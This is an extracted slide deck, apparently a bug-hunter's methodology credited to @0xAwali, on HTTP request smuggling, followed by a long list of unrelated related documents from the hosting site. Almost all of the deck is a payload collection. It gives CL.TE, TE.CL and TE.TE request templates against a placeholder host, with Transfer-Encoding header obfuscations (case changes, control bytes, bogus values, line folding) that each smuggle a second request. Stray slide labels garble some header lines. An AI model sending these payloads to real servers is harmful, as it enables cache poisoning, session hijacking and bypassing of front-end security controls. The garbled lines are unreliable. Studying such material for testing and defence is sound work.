
Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
X: X\nTransfer-Encoding: chunked
Y: Y\nTransfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees X: X\r\n\rTransfer-Encoding: chunked

● Blog POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
X: X\r\n\rTransfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

X: X\r\n\rTransfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
X: X\r\n\rTransfer-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
X: X\r\n\rTransfer-Encoding: chunked
Y: Y\r\n\rTransfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees Content-Length:

Number But Backend sees Transfer-Encoding: cow\r\nTransfer-Encoding: chunked

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: cow\r\nTransfer-Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees Transfer-Encoding:

cow\r\nTransfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: cow\r\nTransfer-Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: nothing\r\nTransfer-Encoding: chunked

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer Encoding: chunked

● Video POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer Encoding: chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer Encoding: chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer Encoding: chunked
Transfer Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chùnked

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chùnked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chùnked But Backend sees Content-Length: Number

● Mine POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chùnked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chùnked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: cow, chunked

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow, chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: cow, chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: cow, chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow, chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunked, cow

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked, cow

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunked, cowBut Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunked, cow
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunked, cow
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: identity, chunked

● Blog POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: identity, chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: identity, chunked But Backend sees Content-Length: Number

● Mine POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: identity, chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: identity, chunked
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: cow chunked bar

● Resource POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow chunked bar

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: cow chunked bar But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: cow chunked bar
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: cow chunked bar
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding:chunked

● Blog POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding:chunked

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding:chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding:chunked
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding:chunked
Transfer-Encoding:nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees Transfer-Encoding: chunk

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
Transfer-Encoding: chunk

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

Transfer-Encoding: chunk But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
Transfer-Encoding: chunk
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
Transfer-Encoding: chunk
Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees TrAnSFer-EnCODinG: cHuNkeD

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
TrAnSFer-EnCODinG: cHuNkeD

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

TrAnSFer-EnCODinG: cHuNkeD But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
TrAnSFer-EnCODinG: cHuNkeD
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
TrAnSFer-EnCODinG: cHuNkeD
TrAnSFer-EnCODinG: nOtHiNg

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees TRANSFER-ENCODING: CHUNKED

● Resource POST / HTTP/1.1

Host: www.company.com
● Resource Content-Length: Number
TRANSFER-ENCODING: CHUNKED

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

TRANSFER-ENCODING: CHUNKED But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
TRANSFER-ENCODING: CHUNKED
● Resource Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
TRANSFER-ENCODING: CHUNKED
TRANSFER-ENCODING: NOTHING

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees \x01Transfer-Encoding: chunked

● Video POST / HTTP/1.1

\x01Transfer-Encoding: chunked
Host: www.company.com
Content-Length: Number

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

\x01Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
\x01Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
\x01Transfer-Encoding: chunked
\x01Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees \x07Transfer-Encoding: chunked

● Video POST / HTTP/1.1

\x07Transfer-Encoding: chunked
Host: www.company.com
Content-Length: Number

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

\x07Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
\x07Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
\x07Transfer-Encoding: chunked
\x07Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling CL.TE , Frontend sees

Content-Length: Number But Backend sees \x04Transfer-Encoding: chunked

● Video POST / HTTP/1.1

\x04Transfer-Encoding: chunked
Host: www.company.com
Content-Length: Number

0\r\n
\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.CL , Frontend sees

\x04Transfer-Encoding: chunked But Backend sees Content-Length: Number

● Resource POST / HTTP/1.1

Host: www.company.com
\x04Transfer-Encoding: chunked
Content-Length: Number

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
My Methodology

attacker

Try To Use HTTP Request Smuggling TE.TE , Frontend and Backend See
Transfer-Encoding , Backend Prioritize Content-Length: Number If Abnormal Value

● Mine POST / HTTP/1.1

Host: www.company.com
Content-Length: Number
\x04Transfer-Encoding: chunked
\x04Transfer-Encoding: nothing

Backend\r\n
GET / HTTP/1.1\r\n
Host: www.company.com\r\n
\r\n
0\r\n
\r\n
Thank
You
Mahmoud M. Awali
@0xAwali

Susan Rice Response To Grassley-Graham
100% (9)
Susan Rice Response To Grassley-Graham
2 pages
HTTP Request Smuggling
No ratings yet
HTTP Request Smuggling
6 pages
HTTP Request Smuggling
No ratings yet
HTTP Request Smuggling
43 pages
HTTP Request Smuggling in 2020
No ratings yet
HTTP Request Smuggling in 2020
13 pages
HTTP Desync Attack
No ratings yet
HTTP Desync Attack
18 pages
HTTP Response Smuggling - Paper
No ratings yet
HTTP Response Smuggling - Paper
24 pages
HTTP Attacks - @CyberFreeCourses
No ratings yet
HTTP Attacks - @CyberFreeCourses
65 pages
HTTP Request Smuggling
No ratings yet
HTTP Request Smuggling
23 pages
HRS SMUGGLINGs
No ratings yet
HRS SMUGGLINGs
56 pages
Ccs 2021 Treqs
No ratings yet
Ccs 2021 Treqs
16 pages
HTTP Attacks
No ratings yet
HTTP Attacks
65 pages
Hyper Text Transfer Protocol (HTTP)
No ratings yet
Hyper Text Transfer Protocol (HTTP)
21 pages
L04L - An Introduction To Netcentric Development
No ratings yet
L04L - An Introduction To Netcentric Development
38 pages
Browser Powered Desync Attacks Slides
No ratings yet
Browser Powered Desync Attacks Slides
42 pages
HTTP Desync Attacks Slides
No ratings yet
HTTP Desync Attacks Slides
32 pages
HTTP 2 White Paper
No ratings yet
HTTP 2 White Paper
26 pages
What Are HTTP Headers?: All About PHP in Interaction With HTTP & Dom
No ratings yet
What Are HTTP Headers?: All About PHP in Interaction With HTTP & Dom
56 pages
Web Dev
100% (1)
Web Dev
346 pages
C3SA Module 03 V1
No ratings yet
C3SA Module 03 V1
116 pages
Hypertext Transport Protocol: CS - 328 Dick Steflik
No ratings yet
Hypertext Transport Protocol: CS - 328 Dick Steflik
20 pages
About HTTP Protocol
No ratings yet
About HTTP Protocol
42 pages
HTTP-Basics
No ratings yet
HTTP-Basics
33 pages
HTTP in Detail
No ratings yet
HTTP in Detail
27 pages
World Wide Web - Part I: Indian Institute of Technology Kharagpur
No ratings yet
World Wide Web - Part I: Indian Institute of Technology Kharagpur
23 pages
Making The Most of HTTP in Your Apps
100% (2)
Making The Most of HTTP in Your Apps
70 pages
Fsa CS4.1 HTTP
No ratings yet
Fsa CS4.1 HTTP
31 pages
ENCS3320 Project1V1
No ratings yet
ENCS3320 Project1V1
3 pages
Part - 2 Understanding Hyper Text Transport Protocol
No ratings yet
Part - 2 Understanding Hyper Text Transport Protocol
6 pages
Lecture 1 - Intro To Web Technologies
No ratings yet
Lecture 1 - Intro To Web Technologies
46 pages
Web Technologies Fundamentals and HTTP
No ratings yet
Web Technologies Fundamentals and HTTP
35 pages
Question 1
No ratings yet
Question 1
44 pages
A Practical Guide To Writing Clients and Servers: Go To Table of Contents Go To Footnotes Go To Other Tutorials
No ratings yet
A Practical Guide To Writing Clients and Servers: Go To Table of Contents Go To Footnotes Go To Other Tutorials
18 pages
Rajagiri School of Engineering & Technology: Rajagiri Valley, Kakkanad, Cochin - 682 039
No ratings yet
Rajagiri School of Engineering & Technology: Rajagiri Valley, Kakkanad, Cochin - 682 039
21 pages
HTTP Lecture
No ratings yet
HTTP Lecture
71 pages
Making The Most of HTTP in Your Apps
100% (2)
Making The Most of HTTP in Your Apps
63 pages
HTTP Overview
No ratings yet
HTTP Overview
14 pages
HTTP - Requests
No ratings yet
HTTP - Requests
5 pages
Web Security (CAT-309) - Unit 1 Lecture 3
No ratings yet
Web Security (CAT-309) - Unit 1 Lecture 3
13 pages
HTTP Basics3
No ratings yet
HTTP Basics3
11 pages
Lab07 HTTP
No ratings yet
Lab07 HTTP
4 pages
Se Comps CN Week4 Unit 2,3-Lec10-12
No ratings yet
Se Comps CN Week4 Unit 2,3-Lec10-12
89 pages
Protocolo HTTP
No ratings yet
Protocolo HTTP
6 pages
HTTP
No ratings yet
HTTP
4 pages
HTTP
No ratings yet
HTTP
2 pages
HTTP Basics
No ratings yet
HTTP Basics
3 pages
HTTP Headers
No ratings yet
HTTP Headers
2 pages
Osi Model
No ratings yet
Osi Model
3 pages
Just A Name Following Some Syntax. URL & URN Are Subsets of URI
No ratings yet
Just A Name Following Some Syntax. URL & URN Are Subsets of URI
30 pages
HTTP - Request Explain
No ratings yet
HTTP - Request Explain
11 pages
Lect15 - HTTP
No ratings yet
Lect15 - HTTP
13 pages
(CyberSec'24) Lab02 - Student Version
No ratings yet
(CyberSec'24) Lab02 - Student Version
49 pages
Tutorial Lab 3
No ratings yet
Tutorial Lab 3
4 pages
World Wide Web: Uniform Resource Locators (URL)
No ratings yet
World Wide Web: Uniform Resource Locators (URL)
5 pages
Overview of HTTP
No ratings yet
Overview of HTTP
4 pages
Unit2-2.1Handling Request Headers
No ratings yet
Unit2-2.1Handling Request Headers
43 pages
HTTP
No ratings yet
HTTP
30 pages
WT - Assignment 01
No ratings yet
WT - Assignment 01
18 pages
Lecture No 2 Fall 2020
No ratings yet
Lecture No 2 Fall 2020
33 pages
PG 1
No ratings yet
PG 1
77 pages
Introduction to PHP, Part 1, Second Edition
From Everand
Introduction to PHP, Part 1, Second Edition
Adam Majczak
No ratings yet
Hacking of Computer Networks: Full Course on Hacking of Computer Networks
From Everand
Hacking of Computer Networks: Full Course on Hacking of Computer Networks
Dr. Hidaia Mahmood Alassouli
No ratings yet
Pengaruh Valentino Rossi Sebagai Brand Ambassador Dalam Iklan Yamaha R15 Terhadap Keputusan Pembelian Yamaha R15 Di Kalangan YR15CR Chapter Pekanbaru
No ratings yet
Pengaruh Valentino Rossi Sebagai Brand Ambassador Dalam Iklan Yamaha R15 Terhadap Keputusan Pembelian Yamaha R15 Di Kalangan YR15CR Chapter Pekanbaru
14 pages
Decentraliserad Datalagring Baserad På Blockkedjan
No ratings yet
Decentraliserad Datalagring Baserad På Blockkedjan
55 pages
Literary Criticism in To Kill A Mockingbird Tutorial 2
No ratings yet
Literary Criticism in To Kill A Mockingbird Tutorial 2
32 pages
List of Documents NIS 2 Documentation Toolkit EN
No ratings yet
List of Documents NIS 2 Documentation Toolkit EN
9 pages
Unit 5 - Word Form - Tiếng Anh 8 Friends Plus
No ratings yet
Unit 5 - Word Form - Tiếng Anh 8 Friends Plus
1 page
Settlement Geography
No ratings yet
Settlement Geography
66 pages
Iccbs TWC PRF 12036 031224
No ratings yet
Iccbs TWC PRF 12036 031224
19 pages
Workings
No ratings yet
Workings
388 pages
CFAS Unit 3 (PRESENTATION OF FINANCIAL STATEMENTS (IAS 1 AND IAS 7) )
No ratings yet
CFAS Unit 3 (PRESENTATION OF FINANCIAL STATEMENTS (IAS 1 AND IAS 7) )
18 pages
Trust Deed Sample
No ratings yet
Trust Deed Sample
12 pages
Wisdom of Kings Workbook
No ratings yet
Wisdom of Kings Workbook
9 pages
Seven Ways To Better Connect Your Security Operations Center
No ratings yet
Seven Ways To Better Connect Your Security Operations Center
18 pages
Innovation Speech
No ratings yet
Innovation Speech
4 pages
Gender Stereotype
No ratings yet
Gender Stereotype
3 pages
Uce Ict P1 2025
100% (1)
Uce Ict P1 2025
3 pages
Ems Atp Grade 7 2020
100% (3)
Ems Atp Grade 7 2020
11 pages
Aff of Acknowlegement
No ratings yet
Aff of Acknowlegement
1 page
Module 2 Exercise Worksheet
No ratings yet
Module 2 Exercise Worksheet
3 pages
Engl 121 History of English Notes
No ratings yet
Engl 121 History of English Notes
36 pages
Reading 21 Free Cash Flow Valuation
No ratings yet
Reading 21 Free Cash Flow Valuation
67 pages
Loch Ness
No ratings yet
Loch Ness
3 pages
Q4 English 6 Week 5
No ratings yet
Q4 English 6 Week 5
31 pages
Rules For Class - 2024
No ratings yet
Rules For Class - 2024
2 pages
Chapter 13
No ratings yet
Chapter 13
4 pages
Expression of Interest PDF
No ratings yet
Expression of Interest PDF
36 pages
Iot Unit - 2
No ratings yet
Iot Unit - 2
9 pages
Manish Manjhi: 4+ Years of Consulting On Sales/Manufacturing/Maintenance/Quality Assuranc
No ratings yet
Manish Manjhi: 4+ Years of Consulting On Sales/Manufacturing/Maintenance/Quality Assuranc
2 pages
Generative AI in Business Consulting Analyzing Its Impact On Client Engagement and Service Delivery Models
No ratings yet
Generative AI in Business Consulting Analyzing Its Impact On Client Engagement and Service Delivery Models
8 pages
Google Hangout Chat: Start Using Google Chats
No ratings yet
Google Hangout Chat: Start Using Google Chats
4 pages